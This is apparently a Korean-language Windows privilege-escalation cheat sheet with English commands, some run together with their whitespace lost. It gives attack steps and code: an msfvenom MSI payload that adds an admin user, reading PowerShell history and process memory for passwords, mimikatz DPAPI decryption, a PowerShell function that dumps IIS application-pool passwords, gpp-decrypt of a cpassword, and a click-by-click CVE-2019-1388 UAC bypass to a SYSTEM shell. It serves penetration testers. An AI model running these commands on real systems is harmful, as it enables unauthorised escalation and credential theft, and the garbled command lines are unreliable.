systeminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get system architecture
[System.Environment]::OSVersion.Version #Current OS versionGet-WmiObject-query'select * from win32_quickfixengineering'|foreach {$_.hotfixid} #List all patchesGet-Hotfix-description"Security update"#List only "Security Update" patches
버전 취약점
이 사이트는 Microsoft 보안 취약점에 대한 자세한 정보를 검색하는 데 유용합니다. 이 데이터베이스에는 4,700개 이상의 보안 취약점이 있으며 Windows 환경이 제공하는 대규모 공격 표면을 보여줍니다.
ConsoleHost_history#Find the PATH where is savedtype%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttypeC:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttype $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtcat (Get-PSReadlineOption).HistorySavePathcat (Get-PSReadlineOption).HistorySavePath |slspassw
#Check is enable in the registryregqueryHKCU\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKLM\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\TranscriptiondirC:\Transcripts#Start a Transcription sessionStart-Transcript-Path"C:\transcripts\transcript0.txt"-NoClobberStop-Transcript
PowerShell 모듈 로깅
PowerShell 파이프라인 실행에 대한 세부 정보가 기록되며, 실행된 명령, 명령 호출 및 스크립트 일부가 포함됩니다. 그러나 완전한 실행 세부 정보와 출력 결과가 캡처되지 않을 수 있습니다.
이를 활성화하려면 설명서의 "Transcript files" 섹션의 지침을 따르고 "Powershell Transcription" 대신 **"Module Logging"**을 선택하십시오.
스크립트의 실행에 대한 완전한 활동 및 전체 내용 기록이 캡처되어 각 코드 블록이 실행될 때마다 문서화됩니다. 이 프로세스는 각 활동에 대한 포괄적인 감사 트레일을 보존하여 포렌식 및 악의적인 행위 분석에 유용합니다. 실행 시 모든 활동을 문서화함으로써 프로세스에 대한 자세한 통찰력이 제공됩니다.
만약 로컬 사용자 프록시를 수정할 수 있는 권한이 있다면, 그리고 Windows 업데이트가 인터넷 익스플로러 설정에 구성된 프록시를 사용한다면, 우리는 PyWSUS를 로컬로 실행하여 자체 트래픽을 가로채고 자산에서 상위 사용자로 코드를 실행할 수 있습니다.
더 나아가, WSUS 서비스는 현재 사용자의 설정을 사용하므로, 현재 사용자의 인증서 저장소도 사용합니다. WSUS 호스트 이름을 위한 자체 서명 인증서를 생성하고 이 인증서를 현재 사용자의 인증서 저장소에 추가하면 HTTP 및 HTTPS WSUS 트래픽을 가로챌 수 있습니다. WSUS는 인증서에 대한 신뢰성 검증을 구현하기 위해 HSTS와 유사한 메커니즘을 사용하지 않습니다. 사용자가 신뢰하고 올바른 호스트 이름을 가진 인증서를 제시하면 서비스에서 인증됩니다.
특정 조건에서 Windows 도메인 환경에서 로컬 권한 상승 취약점이 존재합니다. 이러한 조건에는 LDAP 서명이 강제되지 않는 환경, 사용자가 Resource-Based Constrained Delegation (RBCD)를 구성할 수 있는 자체 권한이 있는 환경, 그리고 사용자가 도메인 내에서 컴퓨터를 생성할 수 있는 능력이 포함됩니다. 이러한 요구 사항은 기본 설정을 사용하여 충족됩니다.
msfvenom-pwindows/adduserUSER=rottenadminPASS=P@ssword123!-fmsi-nouac-oalwe.msi#No uac formatmsfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
만약 미터프리터 세션이 있다면 모듈 **exploit/windows/local/always_install_elevated**을 사용하여 이 기술을 자동화할 수 있습니다.
PowerUP
PowerUP에서 Write-UserAddMSI 명령을 사용하여 현재 디렉토리 내에 권한 상승을 위한 Windows MSI 이진 파일을 생성합니다. 이 스크립트는 사용자/그룹 추가를 요청하는 미리 컴파일된 MSI 설치 프로그램을 작성합니다 (따라서 GUI 액세스가 필요합니다):
Write-UserAddMSI
MSI 래퍼
이 도구를 사용하여 MSI 래퍼를 만드는 방법을 배우려면이 자습서를 읽으십시오. 명령줄을 실행하려면 ".bat" 파일을 래핑할 수 있다는 점에 유의하십시오.
LAPS는 로컬 관리자 암호의 관리를 위해 설계되었으며, 도메인에 가입된 컴퓨터에서 각 암호가 고유하고 무작위로 생성되며 정기적으로 업데이트되도록 보장합니다. 이러한 암호는 Active Directory 내에서 안전하게 저장되며, ACL을 통해 충분한 권한을 부여받은 사용자만이 권한이 부여된 경우에만 로컬 관리자 암호를 볼 수 있습니다.
Windows 8.1부터 Microsoft는 로컬 보안 권한(LSA)에 대한 향상된 보호 기능을 도입하여 신뢰되지 않는 프로세스가 해당 메모리를 읽거나 코드를 삽입하는 시도를 차단하여 시스템을 더욱 안전하게 보호합니다.
LSA 보호에 대한 자세한 정보는 여기를 참조하세요.
도메인 자격 증명은 로컬 보안 권한자 (LSA)에 의해 인증되며 운영 체제 구성 요소에서 사용됩니다. 사용자의 로그온 데이터가 등록된 보안 패키지에 의해 인증되면 사용자의 도메인 자격 증명이 일반적으로 설정됩니다.
캐시된 자격 증명에 대한 자세한 정보는 여기를 참조하세요.
# CMDnetusers%username%#Menetusers#All local usersnetlocalgroup#GroupsnetlocalgroupAdministrators#Who is inside Administrators groupwhoami/all#Check the privileges# PSGet-WmiObject-ClassWin32_UserAccountGet-LocalUser|ftName,Enabled,LastLogonGet-ChildItemC:\Users-Force|select NameGet-LocalGroupMemberAdministrators|ftName,PrincipalSource
특권 그룹
만약 특권 그룹에 속해 있다면 권한 상승이 가능할 수 있습니다. 특권 그룹에 대해 알아보고 권한 상승을 위해 그들을 어떻게 남용할 수 있는지 여기에서 확인하세요:
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (icacls"%%z"2>nul |findstr/i"(F) (M) (W) :\\"|findstr/i":\\ everyone authenticated users todos %username%"&&echo.))
프로세스 이진 파일의 폴더 권한 확인 (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v"system32"^|find ":"') dofor /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (icacls"%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated userstodos%username%" && echo.)
메모리 비밀번호 채굴
Sysinternals의 procdump를 사용하여 실행 중인 프로세스의 메모리 덤프를 생성할 수 있습니다. FTP와 같은 서비스는 메모리에 평문으로 자격 증명을 저장하므로 메모리를 덤프하고 자격 증명을 읽어보세요.
procdump.exe-accepteula-ma<proc_name_tasklist>
보안 취약한 GUI 앱
SYSTEM으로 실행 중인 앱은 사용자가 CMD를 생성하거나 디렉터리를 탐색할 수 있게 할 수 있습니다.
WRITE_DAC: 권한 재구성을 가능하게 하여 서비스 구성을 변경할 수 있는 능력을 제공합니다.
WRITE_OWNER: 소유권 획득 및 권한 재구성을 허용합니다.
GENERIC_WRITE: 서비스 구성을 변경할 수 있는 능력을 상속합니다.
GENERIC_ALL: 또한 서비스 구성을 변경할 수 있는 능력을 상속합니다.
이 취약점의 탐지 및 악용을 위해 _exploit/windows/local/service_permissions_를 활용할 수 있습니다.
서비스 이진 파일 약한 권한
서비스에 의해 실행되는 이진 파일을 수정할 수 있는지 확인하거나 이진 파일이 위치한 폴더에 쓰기 권한이 있는지 확인하세요 (DLL Hijacking).wmic (system32에 없음)을 사용하여 서비스에 의해 실행되는 모든 이진 파일을 가져올 수 있으며 icacls를 사용하여 권한을 확인할 수 있습니다:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) docmd.exe/cicacls"%a"2>nul|findstr"(M) (F) :\"
당신은 sc와 icacls를 사용할 수도 있습니다:
scquerystate=all|findstr"SERVICE_NAME:">>C:\Temp\Servicenames.txtFOR/F"tokens=2 delims= "%iin (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txtFOR/F%iin (C:\Temp\services.txt) DO @sc qc %i |findstr"BINARY_PATH_NAME">>C:\Temp\path.txt
서비스 레지스트리 수정 권한
서비스 레지스트리를 수정할 수 있는지 확인해야 합니다.
다음을 수행하여 서비스 레지스트리에 대한 권한을 확인할 수 있습니다:
regqueryhklm\System\CurrentControlSet\Services/s/vimagepath#Get the binary paths of the services#Try to write every service with its current content (to check if you have write permissions)for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-aclHKLM:\System\CurrentControlSet\services\* |Format-List*|findstr/i"<Username> Users Path Everyone"
인증된 사용자 또는 NT AUTHORITY\INTERACTIVE가 FullControl 권한을 소유하는지 확인해야 합니다. 그렇다면 서비스에 의해 실행되는 이진 파일을 변경할 수 있습니다.
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
호스트 파일
호스트 파일에 하드코딩된 다른 알려진 컴퓨터를 확인하세요.
type C:\Windows\System32\drivers\etc\hosts
네트워크 인터페이스 및 DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
오픈 포트
외부에서 제한된 서비스를 확인합니다.
netstat -ano #Opened ports?
라우팅 테이블
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP 테이블
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
루트로 bash를 쉽게 시작하려면 `--default-user root`를 시도해 볼 수 있습니다.
`WSL` 파일 시스템을 다음 폴더에서 탐색할 수 있습니다. `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
## Windows 자격 증명
### 윈로그온 자격 증명
**데이터 보호 API (DPAPI)**는 주로 Windows 운영 체제 내에서 대칭 키를 사용하여 데이터를 대칭 암호화하는 방법을 제공합니다. 이 암호화는 사용자 또는 시스템 비밀을 엔트로피에 상당한 기여를 합니다.
DPAPI는 사용자의 로그인 비밀로부터 파생된 대칭 키를 통해 키를 암호화하는 기능을 제공합니다. 시스템 암호화가 관련된 시나리오에서는 시스템의 도메인 인증 비밀을 활용합니다.
DPAPI를 사용하여 암호화된 사용자 RSA 키는 %APPDATA%\Microsoft\Protect\{SID} 디렉토리에 저장됩니다. 여기서 {SID}는 사용자의 보안 식별자를 나타냅니다. DPAPI 키는 사용자의 개인 키를 보호하는 마스터 키와 함께 동일한 파일에 공존하며, 일반적으로 64바이트의 무작위 데이터로 구성됩니다. (이 디렉토리에 대한 액세스는 제한되어 있어 CMD의 dir 명령을 통해 내용을 나열하는 것을 방지하지만 PowerShell을 통해 나열할 수 있습니다).
다음은 적절한 인수(/pvk 또는 /rpc)를 사용하여 mimikatz 모듈dpapi::masterkey를 사용하여 해독할 수 있습니다.
일반적으로 마스터 암호로 보호된 자격 증명 파일은 다음 위치에 있습니다:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
mimikatz 모듈dpapi::cred를 사용하여 적절한 /masterkey로 복호화할 수 있습니다.
루트 권한이 있는 경우 sekurlsa::dpapi 모듈을 사용하여 메모리에서 다수의 DPAPI 마스터키를 추출할 수 있습니다.
PowerShell 자격 증명은 주로 스크립팅 및 자동화 작업에 사용되며 암호화된 자격 증명을 편리하게 저장하는 방법으로 사용됩니다. 이러한 자격 증명은 일반적으로 DPAPI를 사용하여 보호되며 일반적으로 생성된 컴퓨터에서 동일한 사용자에 의해서만 복호화될 수 있습니다.
Mimikatz의 dpapi::rdg 모듈을 적절한 /masterkey와 함께 사용하여 .rdg 파일을 해독합니다.
Mimikatz의 sekurlsa::dpapi 모듈을 사용하여 메모리에서 다양한 DPAPI 마스터 키를 추출할 수 있습니다.
Sticky Notes
사람들은 종종 Windows 워크스테이션에서 StickyNotes 앱을 사용하여 비밀번호 및 기타 정보를 저장하는데, 이것이 데이터베이스 파일임을 깨닫지 못합니다. 이 파일은 C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite에 위치하며 항상 검색하고 조사할 가치가 있습니다.
AppCmd.exe
AppCmd.exe에서 비밀번호를 복구하려면 관리자 권한이 필요하며 높은 통합 수준에서 실행해야 합니다.
AppCmd.exe는 %systemroot%\system32\inetsrv\ 디렉토리에 있습니다.
이 파일이 존재하면 일부 자격 증명이 구성되어 있고 복구할 수 있습니다.
function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")
# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
# Get application pool name
$PoolName = $_
# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd
# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd
# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}
# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
# Get Virtual Directory Name
$VdirName = $_
# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd
# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd
# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}
# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}
SCClient / SCCM
C:\Windows\CCM\SCClient.exe 파일이 존재하는지 확인합니다.
설치 프로그램은 SYSTEM 권한으로 실행되며, 많은 프로그램이 DLL Sideloading 취약점에 취약할 수 있습니다 (자세한 정보는https://github.com/enjoiz/Privesc에서 확인 가능).
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
이 기술은 더 이상 유효하지 않은 것으로 보입니다. 몇 가지 ssh 키를 생성하려고 시도했지만 ssh-add를 사용하여 키를 추가하고 ssh를 통해 머신에 로그인했습니다. 레지스트리 HKCU\Software\OpenSSH\Agent\Keys가 존재하지 않으며 procmon은 비대칭 키 인증 중 dpapi.dll의 사용을 식별하지 못했습니다.
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
SiteList.xml 파일을 검색합니다.
Cached GPP Pasword
이전에 사용 가능했던 기능으로, 그룹 정책 환경 설정 (GPP)을 통해 여러 대의 컴퓨터에 사용자 정의 로컬 관리자 계정을 배포할 수 있었습니다. 그러나 이 방법에는 중대한 보안 결함이 있었습니다. 먼저, SYSVOL에 XML 파일로 저장된 그룹 정책 개체 (GPO)에는 모든 도메인 사용자가 액세스할 수 있었습니다. 둘째로, 이러한 GPP 내의 암호는 공개적으로 문서화된 기본 키를 사용하여 AES256로 암호화되었기 때문에 인증된 사용자라면 누구나 복호화할 수 있었습니다. 이는 사용자가 권한을 상승시킬 수 있게 해 심각한 위험을 초래할 수 있었습니다.
이 위험을 완화하기 위해 "cpassword" 필드가 비어 있지 않은 로컬로 캐시된 GPP 파일을 스캔하는 기능이 개발되었습니다. 이러한 파일을 찾으면 해당 기능은 암호를 복호화하고 사용자 정의 PowerShell 객체를 반환합니다. 이 객체에는 GPP 및 파일 위치에 대한 세부 정보가 포함되어 있어 이 보안 취약점의 식별 및 해결에 도움이 됩니다.
다음 파일을 찾기 위해 C:\ProgramData\Microsoft\Group Policy\history 또는 C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (W Vista 이전) 에서 검색합니다:
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
cPassword를 복호화하려면:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
**Component Object Model (COM)**은 Windows 운영 체제 내에 구축된 기술로, 서로 다른 언어의 소프트웨어 구성 요소 간의 상호 통신을 가능하게 합니다. 각 COM 구성 요소는 **클래스 ID (CLSID)**를 통해 식별되며, 각 구성 요소는 하나 이상의 인터페이스를 통해 기능을 노출하며, 이는 인터페이스 ID (IID)를 통해 식별됩니다.
COM 클래스 및 인터페이스는 레지스트리에서 HKEY_CLASSES_ROOT\CLSID 및 HKEY_CLASSES_ROOT\Interface에 정의됩니다. 이 레지스트리는 HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes를 병합하여 생성됩니다 = HKEY_CLASSES_ROOT.
이 레지스트리의 CLSIDs 내부에는 InProcServer32라는 하위 레지스트리가 있으며, 이는 DLL을 가리키는 기본 값과 Apartment (단일 스레드), Free (다중 스레드), Both (단일 또는 다중) 또는 Neutral (스레드 중립)로 설정할 수 있는 ThreadingModel이라는 값이 포함되어 있습니다.
기본적으로, 실행될 DLL 중 하나를 덮어쓸 수 있다면, 해당 DLL이 다른 사용자에 의해 실행될 경우 권한 상승이 가능합니다.
공격자가 COM Hijacking을 영속성 메커니즘으로 사용하는 방법을 알아보려면 다음을 확인하세요:
MSF-Credentials Plugin는 msf 플러그인으로, 피해자 내에서 자격 증명을 검색하는 모든 metasploit POST 모듈을 자동으로 실행하도록 만든 플러그인입니다.
Winpeas는 이 페이지에 언급된 모든 비밀번호가 포함된 파일을 자동으로 검색합니다.
Lazagne는 시스템에서 비밀번호를 추출하는 또 다른 훌륭한 도구입니다.
도구 SessionGopher는 이 데이터를 평문으로 저장하는 여러 도구 (PuTTY, WinSCP, FileZilla, SuperPuTTY 및 RDP)의 세션, 사용자 이름 및 비밀번호를 검색합니다.
Windows는 Named Pipes라는 기능을 제공하여 관련 없는 프로세스가 데이터를 공유할 수 있도록 하며, 심지어 다른 네트워크를 통해서도 가능합니다. 이는 클라이언트/서버 아키텍처를 닮았으며, 역할은 named pipe server와 named pipe client로 정의됩니다.
클라이언트가 파이프를 통해 데이터를 보낼 때, 파이프를 설정한 서버는 SeImpersonate 권한이 있으면 클라이언트의 신원을 취할 수 있습니다. 설정한 파이프를 통해 상호작용하는 특권 프로세스를 모방할 수 있는 기회를 제공하며, 이를 통해 해당 프로세스의 신원을 취함으로써 더 높은 권한을 얻을 수 있습니다. 이러한 공격을 실행하는 방법에 대한 지침은 여기 및 여기에서 찾을 수 있습니다.
낮은 권한 사용자로부터 NT\AUTHORITY SYSTEM으로 (CVE-2019-1388) / UAC 우회
그래픽 인터페이스에 액세스할 수 있고 UAC가 활성화된 경우, 일부 버전의 Microsoft Windows에서 권한이 없는 사용자로부터 터미널이나 "NT\AUTHORITY SYSTEM"과 같은 다른 프로세스를 실행할 수 있습니다.
이를 통해 동일한 취약점을 사용하여 권한 상승 및 UAC 우회가 가능해집니다. 또한, 무언가를 설치할 필요가 없으며, 프로세스 중에 사용된 이진 파일은 Microsoft에 의해 서명되고 발급됩니다.
일부 영향을 받는 시스템은 다음과 같습니다:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
이 취약점을 악용하려면 다음 단계를 수행해야 합니다:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
이러한 토큰 권한을 가지고 있다면 (아마도 이미 고정 프로세스에서 찾을 수 있을 것입니다), SeDebug 권한으로 거의 모든 프로세스 (보호되지 않은 프로세스 제외)를 열고, 프로세스의 토큰을 복사하고 해당 토큰으로 임의의 프로세스를 생성할 수 있습니다.
이 기술을 사용하면 일반적으로 모든 토큰 권한을 가진 SYSTEM으로 실행 중인 프로세스가 선택됩니다 (예, 모든 토큰 권한을 가지지 않은 SYSTEM 프로세스를 찾을 수 있습니다).
여기에서 제안된 기술을 실행하는 코드 예제를 찾을 수 있습니다.
SYSTEM으로 실행 중인 프로세스에서 로드되는 dll을 탈취하면 해당 권한으로 임의의 코드를 실행할 수 있습니다. 따라서 Dll Hijacking은 이러한 종류의 권한 상승에도 유용하며, 더구나 고정 프로세스에서는 dll을 로드하는 데 사용되는 폴더에 쓰기 권한이 있기 때문에 더 쉽게 달성할 수 있습니다.
Dll hijacking에 대해 자세히 알아보세요.
Watson -- 알려진 권한 상승 취약점 검색 (VisualStudio를 사용하여 컴파일해야 함) (사전 컴파일)
SeatBelt -- 구성 오류 검색을 위해 호스트 열거 (권한 상승보다는 정보 수집 도구) (컴파일 필요) (사전 컴파일)LaZagne-- 다양한 소프트웨어에서 자격 증명 추출 (github에 사전 컴파일된 exe)SharpUP-- C#로 PowerUp의 포트Beroot~~~~ -- 구성 오류 확인 (github에서 실행 파일 사전 컴파일). 권장하지 않습니다. Win10에서 잘 작동하지 않습니다.
Windows-Privesc-Check -- 가능한 구성 오류 확인 (파이썬의 exe). 권장하지 않습니다. Win10에서 잘 작동하지 않습니다.
Bat
winPEASbat-- 이 게시물을 기반으로 만든 도구 (accesschk가 제대로 작동하려면 필요하지 않지만 사용할 수 있음).